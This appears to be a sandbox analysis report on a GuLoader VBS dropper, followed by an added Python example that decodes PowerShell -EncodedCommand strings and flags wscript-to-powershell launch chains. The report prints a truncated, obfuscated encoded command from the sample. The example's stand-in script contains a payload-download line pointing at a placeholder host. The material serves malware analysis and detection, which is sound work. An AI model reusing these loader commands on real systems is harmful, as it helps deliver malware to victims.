Windows Analysis Report
doc_65398086_4190362045539.pdf.vbs
Overview
General Information
Detection
GuLoader
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 7096, cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\doc_65398086_4190362045539.pdf.vbs", MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  - powershell.exe (PID: 5504, cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AcwB0AHIAdQA5ACAAUwBCAEUAVQBSAFQARQBSAE4ARQAgAFMAbABhAG4AIABTAHAAbwBuAHQAYQBuADcAIABVAE4AQwBBAEwATAAgAGUAbQBiAG8AIAByAGUAaQB0ACAAVABhAHIAcABhAHAAZQAgAHUAZwBpAGYAdABlAHMAZAAgAEIAQQBDAEsAUwBUAEEASQBSACAAZQBnAG8AaQB0AHkAaAAgAFMAbQBlAGQAIABVAFIATwBHAEUATgAgAHYAYQBzAG8AcgByAGgAYQBwACAAQQBtAGUAdAByAG8AIABQAEEAUgBBAFAASABSAEEAUwBUACAASwByAHkAbQBtAGUAbABsAG8AYwAyACAASQBOAFQARQBSAFMAUABJAFIAIABVAG4AcwBxAHUAZQA2ACAAagBhAGMAbwBiAGkAdABpAHMAIABQAEgATwBOAE8AUABIACAAQQBiAHMAYwBvAG4AZABlAHIAcwA3ACAAQwBoAGkAawBpAHQAYQBvAHAAcwAgAFMASwBZAEcARwAgAEQATwBNAE0ARQBEAEEARwBTACAAbgBvAG4AYQBzAHMAaQBzAHQAYQAgAEEAcgBjAGgAYwBoAGUAIAB0AHYAaQB2ACAASwBhAHAAcgBpAGYAbwBsAGkAIABGAGkAbgBhAG4AcwB0AGkAIAANAAoAIwBUAHIAaQBwAHAAZQB0AHMAIABNAGwAawBlADIAIABuAG8AbgBlAHgAcABsAG8AcgAgAEYATwBMAEsARQBDAEUAIABBAHIAdgBlAGYAbABnAGUAIABGAEEAUwBUAFAAUgBJAFMAUwBZACAASABvAGcAZwB3ADYAIABSAGUAcABlAHQANAAgAEgAQQBMAFYATwBOAEsATABFACAAQQByAGIAZQBqAGQAcwAgAFAATABPAFQAVABFAFIAIABUAHMAZQBkACAADQAKACMARAB5AG4AYQBtAGkAawBrAGUAbgA3ACAAUwBUAEsAWQBTAFQAVAAgAEgAeQBkAHIAbwBuAGkAdAA1ACAAcgBlAGQAaQBzAHQAcgBpACAAbQBlAHIAaQBjAGEAcgAgAHYAaQBwAHAAIABGAGEAYgByADEAIABGAEwATwBWAE0AQQAgAEEAQQBOAEQAUwBIAE8AIABTAHQAYQBhAGwAcwB0AHUAIABKAEUAUwBVAEkAIABUAGEAbgBhACAAQwBvAG0AbQBvACAARwB1AGEAcABpAG4AbwAgAFMAeQBuAGsAcgBvAG4ANwAgAGQAZQB2AGwAaQBuAHIAZQB0ACAATwBtAHMAdABuAGkAbgBnAHMAZwAgAFIAZQBzAGUAMgAgAG0AZQB0AHIAbwBsAG8AIABTAFUARwBFAE4ARQBLAEQAQgBPACAAUwB2AGkAcgBwAGUAdABzAHUAbQAxACAAaAB5AGQAcgBhAHQAZQByACAATwBCAFMARQBSAFYAQQAgAFQARQBNAFAAQQBOAEEAIABWAEkASwBJAE4ARwBFAFIAIAB1AHAAcgBpAHYAZQBlAGsAcwAgAGgAZQBhAHIAdABiACAARQBtAGIAZQBkACAAVQBOAEEAUwBTAEUATgAgAE8AUABLAEwAQQAgAGUAZQBiAHIAZQBlAHIAZQAgAFAAaQBjAHIAaQB0AGkAYwAzACAADQAKACMARQBFAEwASQBFAFMAVAAgAEMAcgB5AHMAdABhAGwAbwBnADEAIABEAFUAUwBJAEU4ATQBFACAASQBuAGQAaQB2ADgAIAB1AGQAcwBrAHIAaQBmAHQAcwBwACAAVABlAGsAbgBvAGsAcgBhADEAIAB0AHkAbgBkAHQAZgAgAEUAbABlAHYAdABpAG0AZQA2ACAAZAB5AGsAcwB2ACAAYgBvAG4AYgBvAG4AZQByAHMAIABhAG4AdABpAGMAYQBwAGkAdAAgAHUAbgBkAGUAcgAgAHYAaQBlAHIAIABZAEQARQBSAFAAIABLAGwAYgBlAGIAYQBhAG4AZAA5ACAAVgBpAHAAcwB0ADQAIABNAGEAeABpAG0AbwBuACAAQQBwAHAAcgBhAGkAcwBlADQAIABBAFIAVABJAEcARQBSACAADQAKACMAVQBEAFMASwBSAEkARABOACAAegBpAHQAYQBzACAAcwBwAGEAbgBrACAAVABpAHAAcABlAHIAaABvADYAIABzAGMAcgBvAGwAIABGAG4AaQBzAHIAIABGAFIAQQBTAEkARwBFACAAZABpAGUAdABpAGMAaQBhACAAaABhAGEAbgAgAFMAcABhAGEAbQBuAGQAcwAxACAAcwBlAHIAdgBpACAATABlAGQAcwBhAGcAZQBtAHUAIABVAG4AZABlAHIAawBlAG4AZAB0ADcAIABTAGEAbgBkAHAANA
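The two findings that matter most in this report are the launch chain (wscript.exe starting powershell.exe with a very long -EncodedCommand) and the double extension on the dropped script name. The following is an added example, not part of the sandbox report or of the sample itself: it decodes a PowerShell -EncodedCommand (base64 over UTF-16LE, tolerant of the spaces that PDF extraction inserted into the string above and of a string cut off mid-way), strips the '#' comment padding that the report's command decodes to (the first 24 base64 characters printed above decode to a line beginning with '#'), and runs a small triage over constructed process-creation events. The PIDs and the script path are taken from the report; the encoded payload, the placeholder URL, the parent PID 4000, the benign third event and the list of -EncodedCommand spellings are assumptions made for illustration.

```python
"""Added example (not from the sandbox report): decode a PowerShell
-EncodedCommand and triage a wscript.exe -> powershell.exe launch chain."""
import base64
import re
from pathlib import PureWindowsPath

# Constructed stand-in for the sample's script: '#' comment lines of junk words
# around two real statements. The URL is a placeholder, not the sample's C2.
PADDED_SCRIPT = (
    "#Instru9 SBEURTERNE Slan Spontan7 UNCALL embo reit\r\n"
    "#Trippets Mlke2 nonexplor FOLKECE Arveflge\r\n"
    "$u = 'https://example.invalid/payload.bin'\r\n"
    "#Dynamikken7 STKYSTT Hydronit5 redistri\r\n"
    "$b = (New-Object Net.WebClient).DownloadData($u)\r\n"
)

def encode_command(script: str) -> str:
    """What powershell.exe -EncodedCommand expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(b64: str) -> str:
    """Inverse of encode_command. Tolerates whitespace that report/PDF extraction
    inserts into the string and a string cut off mid-way, as in the report above."""
    cleaned = re.sub(r"\s+", "", b64)
    cleaned = cleaned[: len(cleaned) - len(cleaned) % 4]  # drop an incomplete quartet
    raw = base64.b64decode(cleaned)
    raw = raw[: len(raw) - len(raw) % 2]                  # drop a dangling half code unit
    return raw.decode("utf-16-le", errors="replace")

def strip_comment_padding(script: str) -> list[str]:
    """Keep only lines that are neither blank nor '#' comment padding."""
    return [ln for ln in script.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]

def split_cmdline(cmdline: str) -> list[str]:
    """Windows-style argv split: a double-quoted run is one argument."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; this list of
# spellings is an assumption for illustration, not exhaustive.
ENC_FLAG = re.compile(r"^[-/](e|ec|en|enc|encoded|encodedcommand)$", re.I)
DOUBLE_EXT = re.compile(
    r"\.(pdf|docx?|xlsx?|jpe?g|png|txt)\.(vbs|vbe|js|jse|wsf|hta|exe|scr)$", re.I)

def triage(events: list[dict]) -> list[str]:
    """Flag wscript.exe started on a double-extension script, and any
    powershell.exe child of wscript.exe that carries an encoded command."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = PureWindowsPath(e["image"]).name.lower()
        parent = by_pid.get(e["ppid"])
        parent_image = PureWindowsPath(parent["image"]).name.lower() if parent else ""
        argv = split_cmdline(e["cmdline"])
        if image == "wscript.exe":
            for arg in argv[1:]:
                name = PureWindowsPath(arg).name
                if DOUBLE_EXT.search(name):
                    findings.append(f"pid {e['pid']}: wscript.exe runs double-extension script {name}")
        if image == "powershell.exe" and parent_image == "wscript.exe":
            for flag, value in zip(argv, argv[1:]):
                if ENC_FLAG.match(flag):
                    code = strip_comment_padding(decode_encoded_command(value))
                    findings.append(
                        f"pid {e['pid']}: wscript.exe -> powershell.exe {flag}, "
                        f"{len(code)} non-comment line(s), first: {code[0] if code else '<none>'}")
    return findings

# Constructed process-creation events; PIDs and the script path follow the report,
# the parent PID 4000 and the benign third process are made up.
SAMPLE_EVENTS = [
    {"pid": 7096, "ppid": 4000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\doc_65398086_4190362045539.pdf.vbs"'},
    {"pid": 5504, "ppid": 7096, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "'
                + encode_command(PADDED_SCRIPT) + '"'},
    {"pid": 6100, "ppid": 4000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},  # not under wscript
]

# First 24 base64 characters of the report's -EncodedCommand, as printed there.
REPORT_PREFIX = "IwBJ AG4AcwB0AH IAdQA5ACAA"

if __name__ == "__main__":
    print(repr(decode_encoded_command(REPORT_PREFIX)))  # a '#' comment line
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Decoding a real sample's command line should be done on the captured event text, not by running the command; the non-comment lines left after stripping the padding are the part worth reading, and in GuLoader-style scripts they are typically a small fraction of the total length.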